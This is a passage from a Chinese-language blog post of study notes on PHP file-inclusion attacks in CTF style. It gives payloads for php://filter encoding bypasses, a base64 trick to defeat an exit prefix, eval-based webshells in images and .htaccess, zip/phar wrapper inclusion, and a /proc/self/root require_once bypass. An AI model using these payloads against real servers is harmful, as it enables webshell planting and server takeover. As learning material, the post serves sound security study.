class="line">SJIS-Mobile<span class="comment">#DOCOMO</span></span><br><span class="line">SJIS-DOCOMO</span><br><span class="line">SJIS-Mobile<span class="comment">#KDDI</span></span><br><span class="line">SJIS-KDDI</span><br><span class="line">SJIS-Mobile<span class="comment">#SOFTBANK</span></span><br><span class="line">SJIS-SOFTBANK</span><br><span class="line">UTF-<span class="number">8</span>-Mobile<span class="comment">#DOCOMO</span></span><br><span class="line">UTF-<span class="number">8</span>-DOCOMO</span><br><span class="line">UTF-<span class="number">8</span>-Mobile<span class="comment">#KDDI-A</span></span><br><span class="line">UTF-<span class="number">8</span>-Mobile<span class="comment">#KDDI-B</span></span><br><span class="line">UTF-<span class="number">8</span>-KDDI</span><br><span class="line">UTF-<span class="number">8</span>-Mobile<span class="comment">#SOFTBANK</span></span><br><span class="line">UTF-<span class="number">8</span>-SOFTBANK</span><br><span class="line">ISO-<span class="number">2022</span>-JP-MOBILE<span class="comment">#KDDI</span></span><br><span class="line">ISO-<span class="number">2022</span>-JP-KDDI</span><br><span class="line">JIS</span><br><span class="line">JIS-ms</span><br><span class="line">CP50220</span><br><span class="line">CP50220raw</span><br><span class="line">CP50221</span><br><span class="line">CP50222</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">1</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">2</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">3</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">4</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">5</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">6</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">7</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">8</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">9</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">10</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">13</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">14</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">15</span>*</span><br><span class="line">ISO-<span class="number">8859</span>-<span class="number">16</span>*</span><br><span class="line">byte2be</span><br><span class="line">byte2le</span><br><span class="line">byte4be</span><br><span class="line">byte4le</span><br><span class="line">BASE64</span><br><span class="line">HTML-ENTITIES</span><br><span class="line">HTML</span><br><span class="line"><span class="number">7</span>bit</span><br><span class="line"><span class="number">8</span>bit</span><br><span class="line">EUC-CN*</span><br><span class="line">CP936</span><br><span class="line">GB18030</span><br><span class="line">HZ</span><br><span class="line">EUC-TW*</span><br><span class="line">CP950</span><br><span class="line">BIG-<span class="number">5</span>*</span><br><span class="line">EUC-KR*</span><br><span class="line">UHC</span><br><span class="line">CP949</span><br><span class="line">ISO-<span class="number">2022</span>-KR</span><br><span class="line">Windows-<span class="number">1251</span></span><br><span class="line">CP1251</span><br><span class="line">Windows-<span class="number">1252</span></span><br><span class="line">CP1252</span><br><span class="line">CP866</span><br><span class="line">IBM866</span><br><span class="line">KOI8-R*</span><br><span class="line">KOI8-U*</span><br><span class="line">ArmSCII-<span class="number">8</span></span><br><span class="line">ArmSCII8</span><br></pre></td></tr></table></figure>

<p>使用时，可以利用burp intruder模块，将上述编码方式作为字典进行测试，找到可以使用的编码。</p>
<p>根据编码格式进行解码，就可以看到源文件。</p>
<h6 id="url二次编码"><a href="#url二次编码" class="headerlink" title="url二次编码"></a>url二次编码</h6><p>原理</p>
<p>当数据上传至浏览器的时候，默认会先解一次 <code>url</code> 编码，但 <code>php</code> 包含的 <code>filter</code> ，包含时会再解一次 <code>url</code> 编码（<code>include</code>函数解<code>urlencode</code>的特性）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php:<span class="comment">//filter/convert.base64-encode/resource=filepath</span></span><br><span class="line">php:<span class="comment">//filter/convert.%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35/resource=filepath</span></span><br><span class="line">php:<span class="comment">//filter/%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34.%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35/resource=filepath</span></span><br></pre></td></tr></table></figure>

<p>注意：filter不能二次编码！</p>
<h4 id="php-filter妙用"><a href="#php-filter妙用" class="headerlink" title="php://filter妙用"></a><code>php://filter</code>妙用</h4><p>源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$content</span> = <span class="string">&#x27;&lt;?php exit; ?&gt;&#x27;</span>;</span><br><span class="line"><span class="variable">$content</span> .= <span class="variable">$_POST</span>[<span class="string">&#x27;data&#x27;</span>];</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;filename&#x27;</span>], <span class="variable">$content</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>.=</code>就是拼接。前面的<code>$content</code>已经给了<code>&lt;?php exit; ?&gt;</code>，所以说不管后面是什么，都会先执行退出。导致后面的语句不执行。这也叫PHP死亡退出。</p>
<p><code>$content</code> 在开头增加了<code>exit</code>过程，导致即使我们成功写入一句话，也执行不了（这个过程在实战中十分常见，通常出现在缓存、配置文件等等地方，不允许用户直接访问的文件，都会被加上<code>if(!defined(XXX)exit;)</code>之类的限制）。那么这种情况下，如何绕过这个“死亡exit”？</p>
<p>绕过其实也很简单，POST方式提交了参数，这个是可控的，所以尝试PHP伪协议来进行写入一句话，并且使用base64-decode去除死亡退出。</p>
<p>利用<code>php://filter</code>流的<code>base64_decode</code>函数特性去除死亡<code>exit</code>，base64编码中只包含64个可打印字符，在解码的时候，遇到这64个之外的字符，就会略过，<code>&lt;?php exit; ?&gt;</code>这条代码base64解码时，会解码为<code>phpexit</code>，base64解码是<strong>四个byte</strong>一组，所以再增加一个字符，凑够两组，后面的就会正常解码</p>
<p>payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">filename=php:<span class="comment">//filter/write=convert.base64-decode/resource=shell.php&amp;data=aPD9waHAgcGhwaW5mbygpOyA/Pg</span></span><br></pre></td></tr></table></figure>

<p><code>$data</code>中<code>a</code>是为了使base64解码时的phpexit变为8个字节；而<code>PD9waHAgcGhwaW5mbygpOyA/Pg</code>则是<code>&lt;?php phpinfo();?&gt;</code>的base64编码，最终可在shell.php中找到。</p>
<h3 id="包含上传文件获取服务器权限"><a href="#包含上传文件获取服务器权限" class="headerlink" title="包含上传文件获取服务器权限"></a>包含上传文件获取服务器权限</h3><h4 id="直接包含上传的图片文件"><a href="#直接包含上传的图片文件" class="headerlink" title="直接包含上传的图片文件"></a>直接包含上传的图片文件</h4><p>在网站上传位置上传木马图片<code>evil.jpg</code>：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">echo</span> (<span class="number">123</span>);<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;0&#x27;</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>直接访问<code>evil.jpg</code>，是破损的图片</p>
<p>利用文件包含漏洞，访问<code>http://127.0.0.1/includefile/test.php?file=evil.jpg</code>，可以执行<code>evil.jpg</code>的代码；</p>
<p>利用蚁剑等工具，可以获取服务器shell。</p>
<h4 id="使用压缩协议包含文件"><a href="#使用压缩协议包含文件" class="headerlink" title="使用压缩协议包含文件"></a>使用压缩协议包含文件</h4><p><code>zip://</code>、<code>bzip2://</code>、<code>zlib://</code> 协议，都属于压缩协议，可以访问压缩文件中的子文件。 </p>
<p>适用场景：有的服务器运行文件包含，但是强制给文件添加.php后缀，导致攻击者无法包含非.php后缀的文件。 </p>
<p>利用格式：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//example.com?file=zip://绝对路径//test.zip%23test_filename</span></span><br></pre></td></tr></table></figure>

<p>优缺点：优点是可以绕过包含的固定后缀。缺点是需要知道文件的绝对路径</p>
<p> 演示：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/includefile/test.php?file=zip://D:\web13\web13app\phpstudy\PHPTutorial\WWW\includefile\1.png%231.txt</span></span><br></pre></td></tr></table></figure>

<h4 id="使用phar协议"><a href="#使用phar协议" class="headerlink" title="使用phar协议"></a>使用<code>phar</code>协议</h4><p><code>phar://</code>协议，类似于 <code>zip</code> 协议，但是可以使用相对路径。 </p>
<p>格式：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//example.com/file.php?file=phar://[压缩文件绝对/相对路径]/[压缩文件内的子文件名] </span></span><br></pre></td></tr></table></figure>

<p>优缺点：优点是可以绕过包含的固定后缀。缺点：需要php的版本大于5.3.0 </p>
<p>演示：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/includefile/test.php?file=phar://1.png/1.txt</span></span><br></pre></td></tr></table></figure>

<h3 id="利用-htaccess实现文件包含"><a href="#利用-htaccess实现文件包含" class="headerlink" title="利用.htaccess实现文件包含"></a>利用<code>.htaccess</code>实现文件包含</h3><p>可以写入或者上传<code>.htaccess</code>文件时，可以在<code>.htaccess</code>中写入代码，再包含自己。</p>
<h4 id="实例及详解"><a href="#实例及详解" class="headerlink" title="实例及详解"></a>实例及详解</h4><p>源代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$files</span> = <span class="title function_ invoke__">scandir</span>(<span class="string">&#x27;./&#x27;</span>); </span><br><span class="line">    <span class="keyword">foreach</span>(<span class="variable">$files</span> <span class="keyword">as</span> <span class="variable">$file</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">is_file</span>(<span class="variable">$file</span>))&#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="variable">$file</span> !== <span class="string">&quot;index.php&quot;</span>) &#123;</span><br><span class="line">                <span class="title function_ invoke__">unlink</span>(<span class="variable">$file</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;content&#x27;</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>])) &#123;</span><br><span class="line">        <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">        <span class="keyword">die</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$content</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;content&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;on&#x27;</span>) || <span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;html&#x27;</span>) || <span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;type&#x27;</span>) || <span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;flag&#x27;</span>) || <span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;upload&#x27;</span>) || <span class="title function_ invoke__">stristr</span>(<span class="variable">$content</span>,<span class="string">&#x27;file&#x27;</span>)) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Hacker&quot;</span>;</span><br><span class="line">        <span class="keyword">die</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$filename</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/[^a-z\.]/&quot;</span>, <span class="variable">$filename</span>) == <span class="number">1</span>) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Hacker&quot;</span>;</span><br><span class="line">        <span class="keyword">die</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$files</span> = <span class="title function_ invoke__">scandir</span>(<span class="string">&#x27;./&#x27;</span>); </span><br><span class="line">    <span class="keyword">foreach</span>(<span class="variable">$files</span> <span class="keyword">as</span> <span class="variable">$file</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">is_file</span>(<span class="variable">$file</span>))&#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="variable">$file</span> !== <span class="string">&quot;index.php&quot;</span>) &#123;</span><br><span class="line">                <span class="title function_ invoke__">unlink</span>(<span class="variable">$file</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$filename</span>, <span class="variable">$content</span> . <span class="string">&quot;\nHello, world&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>简单分析一下，先<code>scandir函数</code>来获取指定目录 <code>./</code>下的所有文件和文件夹的列表，然后如果不为<code>index.php</code>，则<code>unlink函数</code>删除文件。接着就是对上传文件写入内容的黑名单过滤，然后对文件名正则匹配无字母。最后<code>file_put_contents</code>读取文件</p>
<p>payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?filename=.htaccess&amp;content=php_value auto_prepend_fil\e .htaccess <span class="comment">#&lt;?php system(&#x27;cat /fla\g&#x27;);?&gt;\</span></span><br><span class="line"><span class="comment"># 别忘了url编码</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?filename=.htaccess&amp;content=php_value auto_prepend_fi\le <span class="string">&quot;.htaccess&quot;</span> <span class="comment">#&lt;?php @eval($_GET[&#x27;cmd&#x27;]); ?&gt;\</span></span><br><span class="line"><span class="comment"># 一句话木马也行</span></span><br></pre></td></tr></table></figure>

<p><code>php_value auto_prepend_file</code>表示在执行本目录文件前需要包含指定的文件</p>
<p><code> \</code>的作用是拼接上下文，可以用于绕过关键字过滤</p>
<p><code>#</code>在<code>.htaccess</code>中是注释的意思，但在包含<code>.htacess</code>后不是注释（因为<code>#</code>不是php的注释符），所以可以将一句话木马写在<code>#</code>之后</p>
<p>最后的<code>\</code>是为了和代码最后面拼接的<code>\nHello,world</code>，使这部分也在<code>.htaccess</code>中被当作注释，否则<code>hello world</code>到第四行会执行报错</p>
<h3 id="require-once绕过不能重复包含文件的限制"><a href="#require-once绕过不能重复包含文件的限制" class="headerlink" title="require_once绕过不能重复包含文件的限制"></a>require_once绕过不能重复包含文件的限制</h3><p>PHP的小 Trick， require_once 包含的软链接层数较多事 once 的 hash 匹配会直接失效造成重复包含。</p>
<p>源代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">require_once</span> <span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>])) &#123;</span><br><span class="line"> <span class="keyword">require_once</span> <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>解题需要绕过require_once对同一文件（flag.php）只能包含一次的限制。</p>
<p>题payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?file=php:<span class="comment">//filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/se</span></span><br><span class="line">lf/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/<span class="keyword">var</span>/www/html/flag.php</span><br></pre></td></tr></table></figure>

<p>原理解析：</p>
<p>php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中，当软连接多到一定程度后，可以绕过这个哈希表，让php认为我们传入的文件名不在哈希表中。 </p>
<p>软连接：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/proc/<span class="built_in">self</span>指向当前进程的/proc/pid/ </span><br><span class="line">/proc/<span class="built_in">self</span>/root/是指向/的符号链接，也就是根目录 </span><br><span class="line">/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/proc/<span class="built_in">self</span>/root/，多个/proc/<span class="built_in">self</span>/root/拼接起来还是根目录</span><br></pre></td></tr></table></figure>




    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>Ed3n
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2024/03/09/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" title="文件包含学习记录">http://example.com/2024/03/09/文件包含/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag"># 文件包含</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2024/03/09/%E6%97%A0%E5%AD%97%E6%AF%8DRCE/" rel="next" title="无数字字母RCE学习记录">
      无数字字母RCE学习记录 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="nav-number">1.</span> <span class="nav-text">文件包含</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AE%A4%E8%AF%86%E6%98%AF%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%EF%BC%9A"><span class="nav-number">1.1.</span> <span class="nav-text">认识是文件包含：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E7%8E%AF%E5%A2%83%E8%A6%81%E6%B1%82%EF%BC%9A"><span class="nav-number">1.1.1.</span> <span class="nav-text">文件包含的环境要求：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="nav-number">1.1.2.</span> <span class="nav-text">常见文件包含函数：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%89%B9%E6%80%A7%EF%BC%9A"><span class="nav-number">1.1.3.</span> <span class="nav-text">文件包含特性：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%88%A9%E7%94%A8"><span class="nav-number">1.2.</span> <span class="nav-text">文件包含利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%AF%BB%E5%8F%96%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.1.</span> <span class="nav-text">读取敏感文件</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.1.1.</span> <span class="nav-text">常见敏感文件</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Windows"><span class="nav-number">1.2.1.1.1.</span> <span class="nav-text">Windows</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Linux"><span class="nav-number">1.2.1.1.2.</span> <span class="nav-text">Linux</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E6%B5%81%E5%B0%81%E8%A3%85%E5%99%A8"><span class="nav-number">1.2.2.</span> <span class="nav-text">数据流封装器</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%AF%BB%E5%8F%96%E6%BA%90%E4%BB%A3%E7%A0%81"><span class="nav-number">1.2.3.</span> <span class="nav-text">读取源代码</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%9B%AE%E7%9A%84"><span class="nav-number">1.2.3.1.</span> <span class="nav-text">目的</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8"><span class="nav-number">1.2.3.2.</span> <span class="nav-text">基本使用</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%9B%B4%E6%8E%A5%E8%AF%BB%E5%86%99"><span class="nav-number">1.2.3.2.1.</span> <span class="nav-text">直接读写</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E5%99%A8%E7%9A%84%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8"><span class="nav-number">1.2.3.2.2.</span> <span class="nav-text">过滤器的基本使用</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#base64-%E7%9A%84%E7%BC%96%E7%A0%81%E4%B8%8E%E8%A7%A3%E7%A0%81"><span class="nav-number">1.2.3.2.2.1.</span> <span class="nav-text">base64 的编码与解码</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#rot13-%E5%8A%A0%E5%AF%86%E4%B8%8E%E8%A7%A3%E5%AF%86"><span class="nav-number">1.2.3.2.2.2.</span> <span class="nav-text">rot13 加密与解密</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E5%99%A8%E5%88%97%E8%A1%A8"><span class="nav-number">1.2.3.2.3.</span> <span class="nav-text">过滤器列表</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%A4%9A%E4%B8%AA%E8%BF%87%E6%BB%A4%E5%99%A8%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="nav-number">1.2.3.2.3.1.</span> <span class="nav-text">多个过滤器的使用</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E5%99%A8%E8%A2%ABban"><span class="nav-number">1.2.3.2.4.</span> <span class="nav-text">过滤器被ban</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="nav-number">1.2.3.2.4.1.</span> <span class="nav-text">大小写绕过</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#convert-iconv%E8%BD%AC%E7%BC%96%E7%A0%81"><span class="nav-number">1.2.3.2.4.2.</span> <span class="nav-text">convert.iconv转编码</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#url%E4%BA%8C%E6%AC%A1%E7%BC%96%E7%A0%81"><span class="nav-number">1.2.3.2.4.3.</span> <span class="nav-text">url二次编码</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#php-filter%E5%A6%99%E7%94%A8"><span class="nav-number">1.2.3.3.</span> <span class="nav-text">php:&#x2F;&#x2F;filter妙用</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8C%85%E5%90%AB%E4%B8%8A%E4%BC%A0%E6%96%87%E4%BB%B6%E8%8E%B7%E5%8F%96%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%9D%83%E9%99%90"><span class="nav-number">1.2.4.</span> <span class="nav-text">包含上传文件获取服务器权限</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%9B%B4%E6%8E%A5%E5%8C%85%E5%90%AB%E4%B8%8A%E4%BC%A0%E7%9A%84%E5%9B%BE%E7%89%87%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.4.1.</span> <span class="nav-text">直接包含上传的图片文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8%E5%8E%8B%E7%BC%A9%E5%8D%8F%E8%AE%AE%E5%8C%85%E5%90%AB%E6%96%87%E4%BB%B6"><span class="nav-number">1.2.4.2.</span> <span class="nav-text">使用压缩协议包含文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8phar%E5%8D%8F%E8%AE%AE"><span class="nav-number">1.2.4.3.</span> <span class="nav-text">使用phar协议</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8-htaccess%E5%AE%9E%E7%8E%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="nav-number">1.2.5.</span> <span class="nav-text">利用.htaccess实现文件包含</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AE%9E%E4%BE%8B%E5%8F%8A%E8%AF%A6%E8%A7%A3"><span class="nav-number">1.2.5.1.</span> <span class="nav-text">实例及详解</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#require-once%E7%BB%95%E8%BF%87%E4%B8%8D%E8%83%BD%E9%87%8D%E5%A4%8D%E5%8C%85%E5%90%AB%E6%96%87%E4%BB%B6%E7%9A%84%E9%99%90%E5%88%B6"><span class="nav-number">1.2.6.</span> <span class="nav-text">require_once绕过不能重复包含文件的限制</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

